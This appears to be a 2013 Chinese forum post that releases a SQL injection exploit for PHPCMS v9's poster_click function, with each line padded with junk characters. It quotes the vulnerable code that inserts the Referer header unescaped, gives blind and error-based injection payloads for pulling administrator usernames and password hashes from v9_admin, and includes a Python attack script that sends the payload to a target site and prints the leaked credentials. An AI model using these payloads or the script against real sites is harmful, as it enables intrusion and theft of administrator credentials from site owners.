有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:3 t4 q, p* s7 f+ R; o3 H
1 O5 N. b+ |8 v5 M' j
问题函数\phpcms\modules\poster\index.php
: [5 n0 z9 O9 H; a* T/ g: ~3 G* @
# r- H$ Q# O3 D$ |9 Qpublic function poster_click() {; q: _+ a8 s9 P5 \" l& G: W7 B) e% e$ d
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;* h ~) Z& ^: f- x% B) Q
$r = $this->db->get_one(array('id'=>$id));
/ x, D# W- w; R/ w2 c- |if (!is_array($r) && empty($r)) return false;3 M# M/ F$ Q0 @) f
$ip_area = pc_base::load_sys_class('ip_area');
. v. G5 p: G, V$ip = ip();
. x, F2 t& `, k$area = $ip_area->get($ip);3 u8 O9 C- |4 v4 T4 T- k5 c
$username = param::get_cookie('username') ? param::get_cookie('username') : '';
/ ~$ [, Y2 U% c3 `# ~0 s: ^3 U4 yif($id) {
. k3 L1 r: [" f, f) h$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
; r) u: ?4 k4 Z5 B% I2 u m8 |/ Z$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));. ~ L' `7 C) n3 t) Y7 U
}1 E7 H6 \7 {& ?, [
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));: K$ s; Q* b, ?0 _
$setting = string2array($r['setting']);6 X5 A9 B# w/ R6 ?) {' t
if (count($setting)==1) {( @$ X4 c/ V* P& `
$url = $setting['1']['linkurl'];
+ w6 N1 x3 z: I \; |) z$ z} else {9 u; i4 B" a. R" t6 |- Q0 @% R. D
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];% r1 X7 l; m% W% W3 N0 s) z
}; d! a! y' J8 i- S7 ?: A X
header('Location: '.$url);7 x3 H6 f- Z2 ?8 h! s* X! P
}
' Y& h o% B$ C0 X2 e0 y$ K% o; d# a! R0 Z4 ]7 Z6 m
+ i% U( ^7 u7 T4 ~4 x
: w+ v& e6 n! ~2 o' ?
利用方式:* Z7 ]& x1 ` h. J9 w; E( C
- {! F) L$ Q& G+ _" ]' u1、可以采用盲注入的手法:
. c3 {% `4 P' }4 _/ U
# Q, Q" U9 f& F+ k- |$ z. oreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#4 Z, [8 ?0 t1 V! G3 r- I# g6 z2 m
. r1 o+ J$ ]6 f8 J
通过返回页面,正常与否一个个猜解密码字段。
, N7 I" t2 q0 m5 p; e0 p L8 A) g4 b4 k. P5 e! `. c8 T
2、代码是花开写的,随手附上了:/ J" f2 ^+ E7 R( P0 L5 o
5 P3 ?1 y+ z; q! H! W( Y- O7 C1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)## O) v# H# {2 ]- S- o, c+ b+ c
( L6 v$ o3 _' {; E) s+ ?) |3 S
此方法是爆错注入手法,原理自查。
2 a( j! _8 b% `! @4 @' q
% l. _2 |1 j: G* t! {7 }8 g ! O0 b0 I( G6 O. [, ?% s$ y
; A: B9 @+ ^) ]3 U- C2 V利用程序: \* Y6 c& m2 f: L* s
4 l# v9 M; s8 g1 }#!/usr/bin/env python* [- @% T. X% G
import httplib,sys,re
7 B$ G" `! T$ M% u$ ^) U1 l, W0 p( o0 v/ ]& S; c
def attack():% ^2 h# `4 C3 B
print “Code by Pax.Mac Team conqu3r!”$ w; F8 F# x" ? l* S3 Q6 }# Q) A
print “Welcome to our zone!!!”
: ]$ x; b6 Z+ ~9 S) Durl=sys.argv[1]
8 h& g* t* v) o) Npaths=sys.argv[2]
# }4 d; E7 y5 k6 P0 J6 @! X7 Kconn = httplib.HTTPConnection(url)! c! w+ N3 z U' b
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,4 L( f. p# N! t' @9 z. Q/ e- T
“Accept”: “text/plain”,
0 y$ r$ u) z' u: ~: X# |2 m“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
! w" h x2 f5 ?$ o1 j2 {conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
' h9 K- S6 w3 Kr1 = conn.getresponse()
" `! q% s2 ]! X. Idatas=r1.read()
& ~, P5 ?+ M" u" l, Vdatas=re.findall(r”Duplicate entry \’\w+’”, datas)
! h7 ~/ G; o9 ]; oprint datas[0]
) A1 L& k1 A) w! n0 v7 h$ R$ Cconn.close(), f# y3 p% H( q p$ [# r0 [, B
if __name__==”__main__”:2 G0 L0 U% h& P0 p% o3 ]/ d, S
if len(sys.argv)<3: @9 R" l0 D: f2 _% Z! {, p
print “Code by Pax.Mac Team conqu3r”( S) y% ~; |. {$ X) d- C
print “Usgae:”# {( J# L F/ U& } h
print “ phpcmsattack.py www.paxmac.org /”
% N3 Y2 Q' B/ g9 C* Wprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”2 r# { G1 v4 U5 {
sys.exit(1)
$ B% y! {1 L3 f% [9 w) ?attack()* p! p b# O- j) ]* h5 J
' L" I5 l, v7 B( [4 t |
发表于 2013-1-11 21:01:00
收藏
支持
反对